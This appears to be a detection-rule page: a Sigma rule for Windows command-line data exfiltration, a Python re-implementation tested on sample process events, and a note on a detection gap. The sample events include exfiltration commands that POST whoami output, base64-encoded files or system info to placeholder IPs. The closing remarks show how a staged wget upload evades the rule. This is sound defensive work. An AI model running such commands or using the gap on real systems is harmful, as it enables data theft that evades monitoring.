Potential Data Exfiltration Activity Via CommandLine Tools
Detects the use of various CLI utilities exfiltrating data via web requests
Sigma rule
```yaml
title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: test
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-02
modified: 2025-07-18
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_iwr:
        Image|endswith:
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - 'irm '
            - 'iwr '
            - 'wget '
        CommandLine|contains|all:
            - ' -ur' # Shortest possible version of the -Uri flag
            - ' -me' # Shortest possible version of the -Method flag
            - ' -b'  # Shortest possible version of the -Body flag
            - ' POST '
    selection_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: '--ur' # Shortest possible version of curl's --url flag (curl has no --uri)
    selection_curl_data:
        CommandLine|contains:
            - ' -d ' # Short form of the --data flag
            - ' --data '
    selection_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains:
            - '--post-data'
            - '--post-file'
    payloads:
        - CommandLine|contains:
            - 'Get-Content'
            - 'GetBytes'
            - 'hostname'
            - 'ifconfig'
            - 'ipconfig'
            - 'net view'
            - 'netstat'
            - 'nltest'
            - 'qprocess'
            - 'sc query'
            - 'systeminfo'
            - 'tasklist'
            - 'ToBase64String'
            - 'whoami'
        - CommandLine|contains|all:
            - 'type '
            - ' > '
            - ' C:\'
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
    - Unlikely
level: high
```
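To make the condition concrete, the following is an added example (not code from SigmaHQ, the rule author, or this page): the rule's selections re-implemented in plain Python and run over constructed `process_creation` events. The image paths, command lines and IP addresses (198.51.100.0/24, 203.0.113.0/24 documentation ranges) are made up for the example. The matching mirrors Sigma's default semantics: `contains` and `endswith` are case-insensitive, a list of values under one field is OR-ed, fields within a selection are AND-ed, and `all of selection_curl*` requires both `selection_curl` and `selection_curl_data`.

```python
"""Added example: the Sigma rule's detection logic re-implemented in Python and
evaluated over constructed process_creation events (not SigmaHQ code)."""
from typing import NamedTuple


class Event(NamedTuple):
    image: str         # full path of the created process (Sigma field: Image)
    command_line: str  # its command line (Sigma field: CommandLine)


# Sigma string modifiers (contains, endswith) are case-insensitive by default.
def _contains_any(haystack: str, needles) -> bool:
    h = haystack.lower()
    return any(n.lower() in h for n in needles)


def _contains_all(haystack: str, needles) -> bool:
    h = haystack.lower()
    return all(n.lower() in h for n in needles)


def _endswith_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


SHELLS = ['\\powershell_ise.exe', '\\powershell.exe', '\\pwsh.exe', '\\cmd.exe']
WEB_CMDLETS = ['curl ', 'Invoke-RestMethod', 'Invoke-WebRequest', 'irm ', 'iwr ', 'wget ']
POST_FLAGS = [' -ur', ' -me', ' -b', ' POST ']  # -Uri, -Method, -Body prefixes plus the POST verb
PAYLOAD_KEYWORDS = ['Get-Content', 'GetBytes', 'hostname', 'ifconfig', 'ipconfig', 'net view',
                    'netstat', 'nltest', 'qprocess', 'sc query', 'systeminfo', 'tasklist',
                    'ToBase64String', 'whoami']
TYPE_REDIRECT = ['type ', ' > ', ' C:\\']


def selection_iwr(e: Event) -> bool:
    """Shell image + a web-request cmdlet + every flag a POST with a body needs."""
    return (_endswith_any(e.image, SHELLS)
            and _contains_any(e.command_line, WEB_CMDLETS)
            and _contains_all(e.command_line, POST_FLAGS))


def selection_curl_all(e: Event) -> bool:
    """'all of selection_curl*': selection_curl AND selection_curl_data."""
    return (_endswith_any(e.image, ['\\curl.exe'])
            and _contains_any(e.command_line, ['--ur'])
            and _contains_any(e.command_line, [' -d ', ' --data ']))


def selection_wget(e: Event) -> bool:
    return (_endswith_any(e.image, ['\\wget.exe'])
            and _contains_any(e.command_line, ['--post-data', '--post-file']))


def payloads(e: Event) -> bool:
    """A list of maps in Sigma is OR-ed: either keyword list hit, or all of type/>/C:\\."""
    return (_contains_any(e.command_line, PAYLOAD_KEYWORDS)
            or _contains_all(e.command_line, TYPE_REDIRECT))


def matches(e: Event) -> bool:
    return (selection_iwr(e) or selection_curl_all(e) or selection_wget(e)) and payloads(e)


# Constructed sample events (hypothetical paths, hosts and command lines).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = {
    "iwr_post_whoami": Event(PS_IMAGE,
        'powershell.exe -nop -w hidden -c "iwr -Uri http://198.51.100.7/up -Method POST -Body (whoami)"'),
    "irm_short_flags_base64": Event(r"C:\Program Files\PowerShell\7\pwsh.exe",
        "pwsh -c \"irm -uri http://203.0.113.5/x -me post -b ([Convert]::ToBase64String("
        "[IO.File]::ReadAllBytes('C:\\Users\\Public\\db.bak')))\""),
    "cmd_type_redirect_then_post": Event(r"C:\Windows\System32\cmd.exe",
        r'cmd.exe /c "type C:\Users\Public\dump.txt > C:\Users\Public\o.txt & powershell irm'
        r' -Uri http://203.0.113.5/ -Method POST -Body (Get-Content C:\Users\Public\o.txt)"'),
    "curl_data_file": Event(r"C:\Windows\System32\curl.exe",
        r"curl.exe --url https://203.0.113.5/c -d @C:\Users\Public\systeminfo.txt"),
    # Benign downloads: no POST/-Body, no -d/--data, so the web selections do not fire.
    "iwr_download_only": Event(PS_IMAGE,
        'powershell -c "Invoke-WebRequest -Uri https://example.com/installer.msi -OutFile C:\\Temp\\installer.msi"'),
    "curl_download_only": Event(r"C:\Windows\System32\curl.exe",
        r"curl.exe --url https://example.com/tool.zip -o C:\Temp\tool.zip"),
    # Gap: a staged file POSTed by wget.exe carries no payload keyword on its command line.
    "wget_post_staged_file": Event(r"C:\Tools\wget.exe",
        r"wget.exe --post-file=C:\Users\Public\out.txt http://203.0.113.5/"),
}


def evaluate(events=EVENTS) -> dict:
    """Return {event name: rule matched?} for every event."""
    return {name: matches(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{'ALERT ' if hit else 'no hit'}  {name}")
```

Two things the run makes visible. First, the `-ur`/`-me`/`-b` prefixes catch abbreviated PowerShell parameters (`-me post -b ...`) as well as the full names, which is why the rule keys on the shortest unambiguous prefix rather than on `-Method`. Second, the `payloads` clause requires a collection keyword on the same command line: a file staged by an earlier command and then POSTed with `wget.exe --post-file` (the last event) is not flagged, so this rule should be paired with detections on the staging step (the `type ... > C:\` branch covers only the case where both happen in one `cmd.exe` invocation).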
Related rules
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Usage Of Web Request Commands And Cmdlets
- Usage Of Web Request Commands And Cmdlets - ScriptBlock
- Malicious PowerShell Commandlets - PoshModule
- Malicious PowerShell Commandlets - ProcessCreation